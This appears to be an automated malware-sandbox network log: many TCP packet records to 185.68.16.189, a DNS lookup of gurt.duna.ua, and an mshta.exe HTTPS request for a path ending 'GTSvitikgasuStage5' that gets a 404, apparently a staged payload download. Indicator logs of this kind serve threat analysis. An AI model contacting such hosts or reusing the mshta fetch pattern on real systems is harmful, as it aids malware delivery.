                                                                                                                                                                                                      Oct 27, 2024 07:35:19.913830996 CET49726443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:19.913844109 CET44349726185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:19.914261103 CET49731443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:19.914294004 CET44349731185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:19.914376020 CET49731443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:19.914813042 CET49731443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:19.914832115 CET44349731185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:19.915028095 CET44349727185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:19.915108919 CET49727443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:19.915119886 CET44349727185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:19.915179014 CET44349727185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:19.915230989 CET49727443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:19.915920019 CET49727443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:19.915925980 CET44349727185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:19.917352915 CET49732443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:19.917375088 CET44349732185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:19.917725086 CET49732443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:19.919384956 CET49732443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:19.919404030 CET44349732185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:20.807385921 CET44349731185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:20.807559967 CET49731443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:20.808115005 CET49731443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:20.808128119 CET44349731185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:20.808460951 CET49731443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:20.808471918 CET44349731185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:20.817194939 CET44349732185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:20.817267895 CET49732443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:20.817866087 CET49732443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:20.817871094 CET44349732185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:20.818120003 CET49732443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:20.818129063 CET44349732185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:21.220455885 CET44349731185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:21.220491886 CET44349731185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:21.220513105 CET44349731185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:21.220685959 CET49731443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:21.220685959 CET49731443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:21.220710039 CET44349731185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:21.220758915 CET49731443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:21.229115009 CET44349732185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:21.229166031 CET44349732185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:21.229207039 CET44349732185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:21.229244947 CET49732443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:21.229269981 CET44349732185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:21.229279995 CET49732443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:21.229279995 CET49732443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:21.229285955 CET44349732185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:21.229326010 CET49732443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:21.229361057 CET49732443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:21.235995054 CET44349732185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:21.236162901 CET44349732185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:21.236191034 CET49732443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:21.236233950 CET49732443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:21.236239910 CET44349732185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:21.236341000 CET49732443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:21.236505985 CET49732443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:21.236880064 CET49735443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:21.236901045 CET44349735185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:21.237154007 CET49735443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:21.237426043 CET49735443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:21.237441063 CET44349735185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:21.344193935 CET44349731185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:21.344222069 CET44349731185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:21.344333887 CET49731443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:21.344353914 CET44349731185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:21.344364882 CET49731443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:21.346297026 CET49731443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:21.461401939 CET44349731185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:21.461426973 CET44349731185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:21.461601019 CET49731443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:21.461613894 CET44349731185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:21.461684942 CET49731443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:21.578347921 CET44349731185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:21.578371048 CET44349731185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:21.578459978 CET49731443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:21.578479052 CET44349731185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:21.578540087 CET49731443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:21.695890903 CET44349731185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:21.695914030 CET44349731185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:21.696207047 CET49731443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:21.696221113 CET44349731185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:21.696271896 CET49731443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:21.812449932 CET44349731185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:21.812477112 CET44349731185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:21.812531948 CET49731443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:21.812544107 CET44349731185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:21.812591076 CET49731443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:21.812607050 CET49731443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:21.929543972 CET44349731185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:21.929574013 CET44349731185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:21.929824114 CET49731443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:21.929840088 CET44349731185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:21.929876089 CET49731443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:22.039668083 CET44349731185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:22.039700985 CET44349731185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:22.039798975 CET49731443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:22.039819002 CET44349731185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:22.040807009 CET49731443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:22.153743982 CET44349735185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:22.153866053 CET49735443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:22.154211998 CET49735443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:22.154241085 CET44349735185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:22.154323101 CET49735443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:22.154330015 CET44349735185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:22.156405926 CET44349731185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:22.156451941 CET44349731185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:22.156503916 CET44349731185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:22.156569958 CET49731443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:22.156569958 CET49731443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:22.156570911 CET49731443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:22.157032967 CET49731443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:22.157058001 CET44349731185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:22.158255100 CET49741443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:22.158271074 CET44349741185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:22.158516884 CET49741443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:22.158766985 CET49741443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:22.158782005 CET44349741185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:22.571260929 CET44349735185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:22.571350098 CET44349735185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:22.571393013 CET44349735185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:22.571505070 CET49735443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:22.571538925 CET44349735185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:22.571582079 CET49735443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:22.571599007 CET49735443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:22.573473930 CET49735443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:22.573496103 CET44349735185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:22.574843884 CET49747443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:22.574887037 CET44349747185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:22.575170994 CET49747443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:22.575872898 CET49747443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:22.575892925 CET44349747185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:23.050548077 CET44349741185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:23.050642014 CET49741443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:23.051070929 CET49741443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:23.051079035 CET44349741185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:23.051279068 CET49741443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:23.051284075 CET44349741185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:23.632785082 CET44349741185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:23.632812977 CET44349741185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:23.632873058 CET49741443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:23.632884026 CET44349741185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:23.632904053 CET44349741185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:23.632941008 CET49741443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:23.632961035 CET44349741185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:23.632972002 CET44349741185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:23.633012056 CET49741443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:23.633021116 CET44349741185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:23.633033037 CET49741443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:23.633133888 CET49741443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:23.634758949 CET44349747185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:23.634829044 CET49747443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:23.640847921 CET49747443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:23.640876055 CET44349747185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:23.641135931 CET49747443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:23.641145945 CET44349747185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:23.703697920 CET44349741185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:23.703735113 CET44349741185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:23.703824997 CET49741443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:23.703846931 CET44349741185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:23.703933954 CET49741443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:23.704046965 CET49741443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:23.820766926 CET44349741185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:23.820801973 CET44349741185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:23.820888996 CET49741443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:23.820924044 CET44349741185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:23.820936918 CET49741443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:23.820992947 CET49741443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:23.913665056 CET44349747185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:23.913724899 CET44349747185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:23.913748026 CET49747443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:23.913758993 CET44349747185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:23.913811922 CET49747443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:23.913834095 CET49747443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:23.913836002 CET44349747185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:23.913866043 CET44349747185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:23.913899899 CET49747443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:23.913909912 CET49747443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:23.914016962 CET44349747185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:23.914066076 CET49747443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:23.914987087 CET49747443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:23.914997101 CET44349747185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:23.915735006 CET49753443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:23.915769100 CET44349753185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:23.915867090 CET49753443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:23.916069031 CET49753443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:23.916086912 CET44349753185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:23.937743902 CET44349741185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:23.937778950 CET44349741185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:23.937855959 CET49741443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:23.937875986 CET44349741185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:23.937894106 CET49741443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:23.938241005 CET49741443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:23.938555002 CET44349741185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:23.938659906 CET44349741185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:23.938720942 CET49741443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:23.938790083 CET49741443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:23.950079918 CET49741443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:23.950125933 CET44349741185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:23.952471018 CET49754443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:23.952482939 CET44349754185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:23.952635050 CET49754443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:23.953569889 CET49754443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:23.953588963 CET44349754185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:24.810955048 CET44349753185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:24.811034918 CET49753443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:24.811446905 CET49753443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:24.811454058 CET44349753185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:24.811743021 CET49753443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:24.811760902 CET44349753185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:24.855791092 CET44349754185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:24.855906963 CET49754443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:24.856348038 CET49754443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:24.856360912 CET44349754185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:24.856579065 CET49754443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:24.856586933 CET44349754185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:25.084949970 CET44349753185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:25.084975958 CET44349753185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:25.085047960 CET44349753185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:25.085134029 CET49753443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:25.085275888 CET49753443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:25.086318016 CET49753443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:25.086333990 CET44349753185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:25.087730885 CET49767443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:25.087770939 CET44349767185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:25.088002920 CET49767443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:25.088057995 CET49767443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:25.088064909 CET44349767185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:25.132076979 CET44349754185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:25.132190943 CET49754443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:25.132205963 CET44349754185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:25.132252932 CET44349754185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:25.132282972 CET49754443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:25.132309914 CET49754443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:25.132949114 CET49754443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:25.132961035 CET44349754185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:25.989164114 CET44349767185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:25.989260912 CET49767443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:25.989774942 CET49767443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:25.989779949 CET44349767185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:25.990030050 CET49767443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:25.990036011 CET44349767185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:26.264451981 CET44349767185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:26.264482021 CET44349767185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:26.264549971 CET44349767185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:26.264570951 CET49767443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:26.264597893 CET49767443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:26.264631987 CET49767443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:26.265541077 CET49767443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:26.265563965 CET44349767185.68.16.189192.168.2.5

                                                                                                                                                                                                      UDP Packets

                                                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                      Oct 27, 2024 07:35:05.247592926 CET5418453192.168.2.51.1.1.1
                                                                                                                                                                                                      Oct 27, 2024 07:35:05.376167059 CET53541841.1.1.1192.168.2.5

                                                                                                                                                                                                      DNS Queries

                                                                                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                      Oct 27, 2024 07:35:05.247592926 CET192.168.2.51.1.1.10x4057Standard query (0)gurt.duna.uaA (IP address)IN (0x0001)false

                                                                                                                                                                                                      DNS Answers

                                                                                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                      Oct 27, 2024 07:35:05.376167059 CET1.1.1.1192.168.2.50x4057No error (0)gurt.duna.ua185.68.16.189A (IP address)IN (0x0001)false

                                                                                                                                                                                                      HTTP Request Dependency Graph

                                                                                                                                                                                                      • gurt.duna.ua
                                                                                                                                                                                                      • https:

                                                                                                                                                                                                      HTTPS Proxied Packets

                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                      0192.168.2.549704185.68.16.1894436500C:\Windows\System32\mshta.exe
                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                      2024-10-27 06:35:06 UTC353OUTGET /programy-nauczania/GTSvitikgasuStage5 HTTP/1.1
                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                      Accept-Language: en-CH
                                                                                                                                                                                                      UA-CPU: AMD64
                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                      Host: gurt.duna.ua
                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                      2024-10-27 06:35:07 UTC354INHTTP/1.1 404 Not Found
                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                      Date: Sun, 27 Oct 2024 06:35:07 GMT
                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                      link: <https://gurt.duna.ua/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                      x-turbo-charged-by: LiteSpeed
                                                                                                                                                                                                      x-ray: wnp447:0.300/wn447:0.250/wo447
                                                                                                                                                                                                      X-Page-Speed: on
                                                                                                                                                                                                      Cache-Control: max-age=0, no-cache
